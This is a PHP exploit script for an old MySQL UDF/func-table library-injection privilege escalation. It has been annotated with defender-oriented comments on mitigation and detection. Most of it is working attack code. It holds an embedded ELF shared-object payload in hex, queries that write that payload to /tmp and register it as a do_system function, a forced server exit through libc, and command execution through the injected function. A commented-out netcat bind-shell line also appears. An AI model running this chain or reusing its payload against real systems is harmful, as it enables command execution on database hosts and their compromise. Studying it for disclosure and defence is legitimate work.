- <?
- /*************************************
- ** Mysql CREATE FUNCTION func table arbitrary library injection
- **
- ** Author: Stefano Di Paola
- ** Vulnerable: Mysql <= 4.0.23, 4.1.10
- ** Type of Vulnerability: Local/Remote Privileges Escalation - input validation
- ** Tested On : Mandrake 10.1 /Debian Sarge
- ** Vendor Status: Notified on March 2005
- **
- ** Copyright 2005 Stefano Di Paola (stefano.dipaola@wisec.it)
- **
- **
- ** Disclaimer:
- ** In no event shall the author be liable for any damages
- ** whatsoever arising out of or in connection with the use
- ** or spread of this information.
- ** Any use of this information is at the user's own risk.
- **
- **
- *************************************
- */
- 
- 
- // this is the MySql root password.
- // Hardcoded credential. The script only works with an account that already
- // holds root on the target server (both mysql_connect calls below use it);
- // everything afterwards is that account's FILE privilege and its write
- // access to the mysql schema being turned into code execution as mysqld.
- $pass='useyoupasswordhere';
- 
- // Issue "CREATE database <db>" over $link and return mysql_query's result
- // (false on failure). $db is interpolated into the statement unescaped, i.e.
- // string-built SQL; the only call site in this file passes the literal 'my_db'.
- function mysql_create_db($db,$link)
- {
- $query="CREATE database $db;";
- return mysql_query($query, $link) ;
- 
- }
- // the library in little endian hex. (from NGS's Hackproofing_MySql
- // http://www.nextgenss.com/papers/HackproofingMySQL.pdf )
- // The literal begins with 7f454c46 ("\x7fELF"), so this is a complete ELF
- // shared object; the strings it embeds include "do_system" and "libc.so.6",
- // matching the UDF name registered in mysql.func further down. It is only
- // ever staged as table data and written to disk by the server itself
- // (INTO DUMPFILE), never by this script.
- $solib="0x7f454c4601010100000000000000000003000300010000002006000034000000340a00000000 \
- 00003400200004002800160015000100000000000000000000000000000094070000940700000500000000 \
- 1000000100000094070000941700009417000004010000080100000600000000100000020000009c070000 \
- 9c1700009c170000c8000000c8000000060000000400000051e57464000000000000000000000000000000 \
- 00000000000600000004000000250000002800000000000000260000000000000000000000000000000000 \
- 00000000000022000000270000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000230000001e00000000000000000000000000000000000000000000002000000000000000 \
- 00000000000000000000000021000000250000000000000000000000000000002400000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 000000001c000000000000001f000000000000001d00000000000000000000000000000000000000000000 \
- 0000000000b4000000000000000300010000000000f0010000000000000300020000000000700400000000 \
- 00000300030000000000100500000000000003000400000000006005000000000000030005000000000090 \
- 050000000000000300060000000000c0050000000000000300070000000000d00500000000000003000800 \
- 00000000e8050000000000000300090000000000200600000000000003000a000000000074070000000000 \
- 0003000b0000000000900700000000000003000c0000000000941700000000000003000d00000000009c17 \
- 00000000000003000e0000000000641800000000000003000f00000000006c180000000000000300100000 \
- 00000074180000000000000300110000000000781800000000000003001200000000009818000000000000 \
- 03001300000000000000000000000000030014000000000000000000000000000300150000000000000000 \
- 00000000000300160000000000000000000000000003001700000000000000000000000000030018000000 \
- 000000000000000000000300190000000000000000000000000003001a0000000000000000000000000003 \
- 001b00010000009c170000000000001100f1ff610000000000000076000000120000002f000000d0050000 \
- 00000000120008007900000098180000000000001000f1ff35000000740700000000000012000b003b0000 \
- 000000000097000000220000005e000000080700003600000012000a007200000098180000000000001000 \
- f1ff0a00000078180000000000001100f1ff850000009c180000000000001000f1ff4a0000000000000000 \
- 0000002000000020000000000000000000000020000000005f44594e414d4943005f474c4f42414c5f4f46 \
- 465345545f5441424c455f005f5f676d6f6e5f73746172745f5f005f696e6974005f66696e69005f5f6378 \
- 615f66696e616c697a65005f4a765f5265676973746572436c617373657300646f5f73797374656d006c69 \
- 62632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e33 \
- 00474c4942435f322e30000000000000000000000000000000000000000000000000000000000000000000 \
- 00000000000000000000000000000000000000000000000001000200010001000100030001000100010001 \
- 000000000001000200680000001000000000000000731f6909000003008a000000100000001069690d0000 \
- 02009600000000000000941700000800000098170000080000002b070000021d00008c1800000621000090 \
- 180000062600009418000006270000841800000721000088180000072600005589e583ec08e845000000e8 \
- e0000000e85b010000c9c300ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffff \
- ffffa3100000006808000000e9d0ffffff00000000000000005589e553e8000000005b81c34f120000528b \
- 831c00000085c07402ffd0585bc9c39090909090909090909090909090905589e553e8000000005b81c31f \
- 1200005180bb200000000075348b931400000085d2752f8b8320ffffff8b1085d2741783c004898320ffff \
- ffffd28b8320ffffff8b1085d275e9c68320000000018b5dfcc9c383ec0c8b831cffffff50e846ffffff83 \
- c410ebbd89f68dbc27000000005589e553e8000000005b81c3af110000508b83fcffffff85c0740a8b8318 \
- 00000085c0750b8b5dfcc9c38db60000000083ec0c8d83fcffffff50e809ffffff83c4108b5dfcc9c39055 \
- 89e583ec088b450c8338017409c745fc00000000eb1a83ec0c8b450c8b4008ff30e8fcffffff83c410c745 \
- fc000000008b45fcc9c390905589e55653e8000000005b81c32e1100008d83f0ffffff8d70fc8b40fc83f8 \
- ff740c83ee04ffd08b0683f8ff75f45b5e5dc390905589e553e8000000005b81c3fb10000050e8c6feffff \
- 595bc9c3000000000000941700007018000001000000680000000c000000d00500000d0000007407000004 \
- 000000b4000000050000007004000006000000f00100000a000000a00000000b0000001000000003000000 \
- 781800000200000010000000140000001100000017000000c0050000110000009005000012000000300000 \
- 0013000000080000001600000000000000feffff6f60050000ffffff6f01000000f0ffff6f10050000faff \
- ff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000 \
- 000000ffffffff00000000ffffffff00000000000000009c1700000000000000000000fe0500000e060000 \
- 000000000000000000000000004743433a2028474e552920332e332e3120284d616e6472616b65204c696e \
- 757820392e3220332e332e312d316d646b2900004743433a2028474e552920332e332e3120284d616e6472 \
- 616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e552920332e332e31 \
- 20284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743433a2028474e55 \
- 2920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d326d646b2900004743 \
- 433a2028474e552920332e332e3120284d616e6472616b65204c696e757820392e3220332e332e312d316d \
- 646b2900002e7368737472746162002e68617368002e64796e73796d002e64796e737472002e676e752e76 \
- 657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e \
- 6974002e74657874002e66696e69002e65685f6672616d65002e64617461002e64796e616d6963002e6374 \
- 6f7273002e64746f7273002e6a6372002e676f74002e627373002e636f6d6d656e74000000000000000000 \
- 000000000000000000000000000000000000000000000000000000000000000000000b0000000500000002 \
- 000000b4000000b40000003c01000002000000000000000400000004000000110000000b00000002000000 \
- f0010000f001000080020000030000001c0000000400000010000000190000000300000002000000700400 \
- 0070040000a00000000000000000000000010000000000000021000000ffffff6f02000000100500001005 \
- 000050000000020000000000000002000000020000002e000000feffff6f02000000600500006005000030 \
- 000000030000000100000004000000000000003d0000000900000002000000900500009005000030000000 \
- 02000000000000000400000008000000460000000900000002000000c0050000c005000010000000020000 \
- 000900000004000000080000004f0000000100000006000000d0050000d005000017000000000000000000 \
- 000004000000000000004a0000000100000006000000e8050000e805000030000000000000000000000004 \
- 00000004000000550000000100000006000000200600002006000054010000000000000000000010000000 \
- 000000005b000000010000000600000074070000740700001a000000000000000000000004000000000000 \
- 00610000000100000002000000900700009007000004000000000000000000000004000000000000006b00 \
- 00000100000003000000941700009407000008000000000000000000000004000000000000007100000006 \
- 000000030000009c1700009c070000c8000000030000000000000004000000080000007a00000001000000 \
- 03000000641800006408000008000000000000000000000004000000000000008100000001000000030000 \
- 006c1800006c08000008000000000000000000000004000000000000008800000001000000030000007418 \
- 00007408000004000000000000000000000004000000000000008d00000001000000030000007818000078 \
- 08000020000000000000000000000004000000040000009200000008000000030000009818000098080000 \
- 04000000000000000000000004000000000000009700000001000000000000000000000098080000fa0000 \
- 00000000000000000001000000000000000100000003000000000000000000000092090000a00000000000 \
- 0000000000000100000000000000";
-
- // --- Session 1: root over loopback ---------------------------------------
- // Everything below runs with the root account's MySQL privileges. From a
- // defender's point of view the two steps that matter are the server-side
- // file write (INTO DUMPFILE) and the direct row insert into mysql.func; both
- // show up verbatim in the general query log and both can be restricted.
- $link=mysql_connect("127.0.0.1","root",$pass);
- if (!$link) {
- die('Could not connect: ' . mysql_error());
- }
- echo "Connected successfully as root\n";
- echo "creating db for lib\n";
- // Scratch database that will hold the library as a blob row. The helper
- // interpolates the name unescaped, but only this literal is ever passed.
- mysql_create_db('my_db',$link) or print ('cannot create my_db db, sorry!');
- echo "done....\n";
- echo "selecting db for lib\n";
- // No $link argument here: mysql_select_db falls back to the most recently
- // opened connection, which is $link.
- mysql_select_db('my_db') or print ('cannot use my_db db, sorry!');
- echo "done....\n";
- 
- echo "creating blob table for lib\n";
- $query="CREATE TABLE blob_tab (blob_col BLOB);";
- $result = mysql_query($query, $link) or print("cannot create blob table for lib\n");
- echo "done....\n";
- 
- echo "inserting blob table for lib\n";
- // The hex literal from $solib is stored as raw bytes, so the server now
- // holds the shared object as ordinary row data.
- $query="INSERT into blob_tab values (CONVERT($solib,CHAR));";
- $result = mysql_query($query, $link) or print("cannot insert blob for lib\n");
- echo "done....\n";
- 
- echo "dumping lib in /tmp/libso.so.0...\n";
- // INTO DUMPFILE makes mysqld write the bytes to disk under its own uid; it
- // requires the FILE privilege. Mitigation: never grant FILE to application
- // accounts, and set secure_file_priv (where the server supports it) so that
- // server-side file writes are confined to one directory or disabled
- // outright; a world-writable path such as /tmp should not be reachable.
- $query="SELECT blob_col FROM blob_tab INTO DUMPFILE '/tmp/libso.so.0';";
- $result = mysql_query($query, $link) or print("cannot dump lib\n");
- echo " done....\n";
- 
- mysql_select_db('mysql') or die ('cannot use mysql db, sorry!');
- echo "sending lib....\n";
- 
- // The UDF is registered by inserting straight into mysql.func rather than
- // through CREATE FUNCTION, presumably to sidestep whatever checks CREATE
- // FUNCTION applies to the library path (the advisory title calls this
- // "func table ... injection"). Mitigation: deny write access to the mysql
- // schema to everything but administrators, and audit mysql.func for rows
- // whose dl column points outside the expected library directory (newer
- // releases confine UDF libraries to plugin_dir).
- $query="insert into func (name,dl) values ('do_system','/tmp/libso.so.0');";
- $result = mysql_query($query, $link);
- echo "done....\n";
- echo "Creating exit function to restart server\n";
- 
- // libc's exit() is registered as a UDF and then called, so the server
- // process terminates from inside a query; the echo text above states the
- // aim is a restart so the new func row gets picked up. Whether mysqld
- // actually comes back depends on a supervisor such as mysqld_safe.
- // Detection: a CREATE FUNCTION ... SONAME naming 'libc.so.6' in the query
- // log, or an unexplained mysqld exit shortly after a write to mysql.func.
- $query="create function exit returns integer soname 'libc.so.6';";
- $result = mysql_query($query, $link) or print ("cannot create exit, sorry!\n");
- echo "done....\n";
- echo "Selecting exit function\n";
- 
- $query="select exit();";
- $result = mysql_query($query, $link);
- echo "done!\nWaiting for server to restart\n";
- 
- sleep(1);
- 
- // --- Session 2: reconnect after the restart -------------------------------
- $link=mysql_connect("127.0.0.1","root",$pass);
- if (!$link) {
- die('Could not connect: ' . mysql_error());
- }
- echo "Connected to MySql server again...\n";
- 
- //$cmd ='/usr/sbin/nc -l -p 8000 -e /bin/bash';
- // The command string is interpolated into the query and executed with
- // mysqld's uid through the injected do_system. Running mysqld as a
- // dedicated low-privilege user is what bounds the damage at this point.
- $cmd ='id >/tmp/id';
- echo "Sending Command...$cmd\n";
- $query="select do_system('$cmd');";
- $result = mysql_query($query, $link);
- echo "done!\n";
- echo "Now use your fav shell and ls /tmp/id -l \n";
- mysql_close($link);
- 
- ?>
-
-
-